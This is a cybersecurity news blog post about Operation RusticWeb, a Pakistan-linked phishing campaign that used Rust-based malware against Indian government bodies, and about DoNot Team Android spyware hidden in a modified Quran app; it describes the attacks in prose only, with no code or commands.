Rust-Based Malware Targets Websites of Indian Government Organizations in Operation RusticWeb
A phishing campaign has specifically targeted Indian government agencies and the defense industry with the intention of deploying Rust-based malware for the purpose of acquiring intelligence.
The business security firm SEQRITE has given the codename “Operation RusticWeb” to the behavior, which was initially discovered in October 2023.
“According to security researcher Sathwik Ram Prakki, recent techniques involve using Rust-based payloads and encrypted PowerShell commands to transfer sensitive documents to a web-based service engine, rather than a dedicated command-and-control (C2) server.”
Strategic connections have been discovered between the cluster and the groups commonly known as Transparent Tribe and SideCopy, both of which are believed to have ties to Pakistan.
SideCopy is believed to be a secondary component of Transparent Tribe. SEQRITE has provided a comprehensive report on several coordinated efforts carried out by a malicious actor with the aim of attacking Indian government organizations. These operations involved the distribution of various types of trojans, including AllaKore RAT, Ares RAT, and DRat.
ThreatMon has recently identified additional attack chains that utilize deceptive Microsoft PowerPoint files and carefully designed RAR archives that are vulnerable to CVE-2023-38831. These attack methods are used to deploy malware, allowing unrestricted remote access and control.
“The infection chain of the SideCopy APT Group consists of several meticulously planned steps, designed to guarantee a successful compromise,” stated ThreatMon earlier this year.
The recent series of assaults begins with a phishing email that exploits social engineering methods to deceive users into engaging with harmful PDF files. These files contain Rust-based payloads that discreetly examine the file system while simultaneously displaying a fake file to the target.
In addition to gathering files of interest, the virus is capable of gathering system information and sending it to the C2 server. However, it does not possess the functionalities seen in more sophisticated stealer malware that is available in the criminal underground.
In December, SEQRITE discovered a second infection pathway that follows a comparable multi-stage procedure. However, instead of using the Rust virus, this pathway leverages a PowerShell script to handle the enumeration and exfiltration stages.
However, in a fascinating turn of events, the ultimate payload is deployed via a Rust executable known as “Cisco AnyConnect Web Helper.” The collected data is finally uploaded to the oshi[.]at domain, which serves as an anonymous public file-sharing engine known as OshiUpload.
“Operation RusticWeb may be associated with an Advanced Persistent Threat (APT) as it exhibits resemblances to multiple groups connected to Pakistan,” stated Ram Prakki.
The revelation follows Cyble’s discovery of a malevolent Android application employed by the DoNot Team to target persons in the Kashmir region of India, which occurred approximately two months ago.
The nation-state actor, referred to as APT-C-35, Origami Elephant, and SECTOR02, is suspected to be from India and has a track record of employing Android malware to penetrate smartphones owned by individuals in Kashmir and Pakistan.
Cyble has analyzed a modified version of the open-source GitHub project “QuranApp: Read and Explore.” This version has been infected with spyware functionalities, including the ability to record audio and VoIP calls, take screenshots, collect data from different applications, download extra APK files, and monitor the location of the targeted individual.
“Cyblestated that the DoNot group’s persistent endeavors to enhance their tools and methods highlight the continuous danger they present, especially when it comes to targeting individuals in the vulnerable Kashmir region of India.”
About The Author:
YogeshNaager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blog, he’s also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM. Naager entered the field of content in an unusual way. He began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts. He also combines this interest with a love of narrative, which makes him a good writer in the cybersecurity field. In the bottom line, he frequently writes for Craw Security.
READ MORE ARTICLE HERE